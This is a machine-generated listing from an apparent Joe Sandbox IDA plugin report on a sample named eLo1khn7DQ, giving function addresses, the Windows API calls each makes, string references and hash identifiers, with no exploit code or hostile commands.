Opcode ID: 4ac0ab226695d32f89555f7e103853b629b9144d173a76fd39a1273534f7343b
Instruction ID: d3fd3780d0edb5f737e1594467c961a6e1067a71eedbcf7c65193bdc892aefc2
Opcode Fuzzy Hash: 4ac0ab226695d32f89555f7e103853b629b9144d173a76fd39a1273534f7343b
Instruction Fuzzy Hash: 58516CA05253D23DF73347348C47B7ABEA86B05302F088658E8D5468C2D3B4ECACD766

Function 0022542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00233CD6,?,?,?,?,?,?,?,?,00225BA3,?,?,00233CD6,?,?), ref: 00225470
__fassign.LIBCMT ref: 002254EB
__fassign.LIBCMT ref: 00225506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00233CD6,00000005,00000000,00000000), ref: 0022552C
WriteFile.KERNEL32(?,00233CD6,00000000,00225BA3,00000000,?,?,?,?,?,?,?,?,?,00225BA3,?), ref: 0022554B
WriteFile.KERNEL32(?,?,00000001,00225BA3,00000000,?,?,?,?,?,?,?,?,?,00225BA3,?), ref: 00225584

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7359e5b5f08e1bacf2d9fb0cee7e0f1168c61d0f3c5fb258e3f65b94aadb7b72
Instruction ID: 7410915ebfd0bb73f53ca18d531be6fb9c9086b8fd19a57ab80df125a12e914f
Opcode Fuzzy Hash: 7359e5b5f08e1bacf2d9fb0cee7e0f1168c61d0f3c5fb258e3f65b94aadb7b72
Instruction Fuzzy Hash: 6451F570910669AFDB10CFE8E885BEEBBF9EF08300F14811AF555E3291D7309A61CB60

Function 002710B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0027304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0027307A
Part of subcall function 0027304E: _wcslen.LIBCMT ref: 0027309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00271112
WSAGetLastError.WSOCK32 ref: 00271121
WSAGetLastError.WSOCK32 ref: 002711C9
closesocket.WSOCK32(00000000), ref: 002711F9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 00df3a4f43536194065ef2bdd2db14244da9cd01e4b9ff67603d3631029c6819
Instruction ID: 8e74691dcd81e14c3059635f8ff719e762061b588d791067998f3f061e10627b
Opcode Fuzzy Hash: 00df3a4f43536194065ef2bdd2db14244da9cd01e4b9ff67603d3631029c6819
Instruction Fuzzy Hash: 4341F235610209AFDB109F68D889BAABBE9EF45324F54C059FE0D9F291C770AD51CBE0

Function 0025CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0025DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0025CF22,?), ref: 0025DDFD

Part of subcall function 0025DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0025CF22,?), ref: 0025DE16

lstrcmpiW.KERNEL32(?,?), ref: 0025CF45
MoveFileW.KERNEL32(?,?), ref: 0025CF7F
_wcslen.LIBCMT ref: 0025D005
_wcslen.LIBCMT ref: 0025D01B
SHFileOperationW.SHELL32(?), ref: 0025D061

Strings

\*.*, xrefs: 0025CFF3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 35fac622f1cf8b18d3f359ba3a7b8c9f3c3fd0180a8f6ca42ef3ea6d977fc037
Instruction ID: 2891796a9b98adbfd28475b54e78ea18324d22cec519a9211a8a44b4e9aef717
Opcode Fuzzy Hash: 35fac622f1cf8b18d3f359ba3a7b8c9f3c3fd0180a8f6ca42ef3ea6d977fc037
Instruction Fuzzy Hash: 624176718152195FDF12EFA4DD81ADEB7B8AF18381F1000E6E909EB141EB34AB98CF54

Function 00282DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00282E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00282E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00282E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00282EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00282EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00282EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00282F0B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: cda5f1c06da09e4fa6d4e92516d7520085fad5601234f4831a8c81ab2b9fad2a
Instruction ID: 844f01fe68f98e901979215b8ccc1d1cdd090d63a31120d436616f8e60c8dc85
Opcode Fuzzy Hash: cda5f1c06da09e4fa6d4e92516d7520085fad5601234f4831a8c81ab2b9fad2a
Instruction Fuzzy Hash: 77311538616151DFDB21EF18EC89F6537E4EB9A711F140165F9009B2F2CB71B868DB14

Function 00257726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00257769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0025778F
SysAllocString.OLEAUT32(00000000), ref: 00257792
SysAllocString.OLEAUT32(?), ref: 002577B0
SysFreeString.OLEAUT32(?), ref: 002577B9
StringFromGUID2.OLE32(?,?,00000028), ref: 002577DE
SysAllocString.OLEAUT32(?), ref: 002577EC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7140da62e39ad61a9892c9c37d833bb55cc278992f35a655b4560102cc3182c7
Instruction ID: e937ffe430e12c585e10d02c7887773fe31951491fd35b5ec08ea1c0f5ff9a5c
Opcode Fuzzy Hash: 7140da62e39ad61a9892c9c37d833bb55cc278992f35a655b4560102cc3182c7
Instruction Fuzzy Hash: CF21B27A615219AFDB10EFA8FC88CBBB3ACEB093647108025FD04DB191D670DC458B74

Function 002577FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00257842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00257868
SysAllocString.OLEAUT32(00000000), ref: 0025786B
SysAllocString.OLEAUT32 ref: 0025788C
SysFreeString.OLEAUT32 ref: 00257895
StringFromGUID2.OLE32(?,?,00000028), ref: 002578AF
SysAllocString.OLEAUT32(?), ref: 002578BD

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: e390bb90dd4c44cef586f9db7158ded822b4172a5168ed0410bad24bc3c73fc2
Instruction ID: 24583c1d0c901a885c2d26e60bd95cceae192913d39538f83e3ccae7130fcc3a
Opcode Fuzzy Hash: e390bb90dd4c44cef586f9db7158ded822b4172a5168ed0410bad24bc3c73fc2
Instruction Fuzzy Hash: 3521C135619215AFDB10AFA8EC8CDAA77ECEB083607108025F914CB2A1D770DC85DB78

Function 002604D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 002604F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0026052E

Strings

nul, xrefs: 00260567

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 25a7f6e5dbf40148168c66b6b68f2ede0e75fb8c9677d30ac344c0468bb86ba7
Instruction ID: 990b8e0710036a53dae2e8e21406b6eeb89a82770714fc8cc87b322c97f2a4d5
Opcode Fuzzy Hash: 25a7f6e5dbf40148168c66b6b68f2ede0e75fb8c9677d30ac344c0468bb86ba7
Instruction Fuzzy Hash: 442174759103069FDF209F29DC88A9B77B4BF45724F604A19F8A2D72E0D77099A0EF20

Function 002605A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 002605C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00260601

Strings

nul, xrefs: 00260639

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: fd601c9284818684df8e6505aba278fcc804ea623f366061074a3e85c97fd13d
Instruction ID: 2262721f821dfe961d41c391747e24476ff5e2b91c327b9e51834526b41174f2
Opcode Fuzzy Hash: fd601c9284818684df8e6505aba278fcc804ea623f366061074a3e85c97fd13d
Instruction Fuzzy Hash: 6C2156755103069BDB209F69DC84A5B77E8BF95720F300A19F8A1E72D0D7B099B0DB60

Function 002840AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001F604C
Part of subcall function 001F600E: GetStockObject.GDI32(00000011), ref: 001F6060
Part of subcall function 001F600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001F606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00284112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0028411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0028412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00284139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00284145

Strings

Msctls_Progress32, xrefs: 002840E3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: e40df6efc3ab4990e4e437659a125dc87349e5e5d97fbd32eeaf27e427741665
Instruction ID: 617718a35adc2b1735948f1e2193c7b4a37aff0f1e113f99432a254ce513aa4b
Opcode Fuzzy Hash: e40df6efc3ab4990e4e437659a125dc87349e5e5d97fbd32eeaf27e427741665
Instruction Fuzzy Hash: BE1190B616021ABEEF119F64CC86EE77F5DEF09798F114110BA18A2090CB729C219BA4

Function 0022D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0022D7A3: _free.LIBCMT ref: 0022D7CC

_free.LIBCMT ref: 0022D82D

Part of subcall function 002229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000), ref: 002229DE
Part of subcall function 002229C8: GetLastError.KERNEL32(00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000,00000000), ref: 002229F0

_free.LIBCMT ref: 0022D838
_free.LIBCMT ref: 0022D843
_free.LIBCMT ref: 0022D897
_free.LIBCMT ref: 0022D8A2
_free.LIBCMT ref: 0022D8AD
_free.LIBCMT ref: 0022D8B8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: 340e7a5256a36b7668dd05b49544e0200e3a1b1c68c68aa2c120618de681e943
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: BA115171560B24FAD521BFF0EC47FCBBBDC6F04700F800825B2D9A6092DA6DB5654E50

Function 0025DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0025DA74
LoadStringW.USER32(00000000), ref: 0025DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0025DA91
LoadStringW.USER32(00000000), ref: 0025DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0025DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0025DAB9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: e46881607acb1e96099666d42bd6073b5ee6c9258e62fc2cc0084a4bee438605
Instruction ID: adec69fb5362a2828c0ac24ebcb02a223af1c74d2925666ea90f1223b9222e5c
Opcode Fuzzy Hash: e46881607acb1e96099666d42bd6073b5ee6c9258e62fc2cc0084a4bee438605
Instruction Fuzzy Hash: 070186F69102087FE710EBA4AD8DEE7736CE708301F5004A2B746E2041E7749E844F74

Function 0026096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00CCE0C0,00CCE0C0), ref: 0026097B
EnterCriticalSection.KERNEL32(00CCE0A0,00000000), ref: 0026098D
TerminateThread.KERNEL32(00CCE0B8,000001F6), ref: 0026099B
WaitForSingleObject.KERNEL32(00CCE0B8,000003E8), ref: 002609A9
CloseHandle.KERNEL32(00CCE0B8), ref: 002609B8
InterlockedExchange.KERNEL32(00CCE0C0,000001F6), ref: 002609C8
LeaveCriticalSection.KERNEL32(00CCE0A0), ref: 002609CF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 154e61b171dc491ea20fcd15a2e211741022026cb4b472f6dbb8946bcbd38ab1
Instruction ID: 6a7c491381bf796ba7f43a2e96dd34d9c2f05fb78d01f2bd4a5e915aac374dcd
Opcode Fuzzy Hash: 154e61b171dc491ea20fcd15a2e211741022026cb4b472f6dbb8946bcbd38ab1
Instruction Fuzzy Hash: D4F01932443A02EBD7416FA4FE8CAD6BB29BF01712F502025F202908E5C774A875DFA0

Function 00271C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00271DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00271DE1
WSAGetLastError.WSOCK32 ref: 00271DF2
htons.WSOCK32(?,?,?,?,?), ref: 00271EDB
inet_ntoa.WSOCK32(?), ref: 00271E8C

Part of subcall function 002539E8: _strlen.LIBCMT ref: 002539F2

Part of subcall function 00273224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0026EC0C), ref: 00273240

_strlen.LIBCMT ref: 00271F35

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 98338d1f3e596826e5ba773f541d289a592598f64ba42cfc699a2c07c502e2e2
Instruction ID: 65e02ffa56f3f293c050086e8232883c2102bfed1957a9a55c0d553536057c5e
Opcode Fuzzy Hash: 98338d1f3e596826e5ba773f541d289a592598f64ba42cfc699a2c07c502e2e2
Instruction Fuzzy Hash: 5DB1EF70214301AFC324DF28C895E3A7BE5AF95318F54854CF55A5B2E2CB71ED62CB92

Function 002201B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 002200BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002200D6
__allrem.LIBCMT ref: 002200ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0022010B
__allrem.LIBCMT ref: 00220122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00220140

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: f473cea467a0f104edd4069498a8902cd808dc8b4d8c650817a2eb0e51ffa9be
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: A9813C72A20712BBE7209FA8DC81BAB73E9AF51320F244139F515D76D2E7B0D9718B50

Function 002261FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002182D9,002182D9,?,?,?,0022644F,00000001,00000001,8BE85006), ref: 00226258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0022644F,00000001,00000001,8BE85006,?,?,?), ref: 002262DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002263D8
__freea.LIBCMT ref: 002263E5

Part of subcall function 00223820: RtlAllocateHeap.NTDLL(00000000,?,002C1444,?,0020FDF5,?,?,001FA976,00000010,002C1440,001F13FC,?,001F13C6,?,001F1129), ref: 00223852

__freea.LIBCMT ref: 002263EE
__freea.LIBCMT ref: 00226413

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 092cd8e51ddf69b812f93dd9b636c98c4bbf4b206b93ebf85f0e6e87398b9603
Instruction ID: 4ad6ebfed0d860ed5fc2c256af46070bdba263b80af2c55849f6031845dd2239
Opcode Fuzzy Hash: 092cd8e51ddf69b812f93dd9b636c98c4bbf4b206b93ebf85f0e6e87398b9603
Instruction Fuzzy Hash: 6351E373620226BBDB258FE4EC89EAF77A9EF44B10F1546A9FC05D6140DB74DC60CA60

Function 0027BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

Part of subcall function 0027C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0027B6AE,?,?), ref: 0027C9B5
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027C9F1
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027CA68
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0027BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0027BD25
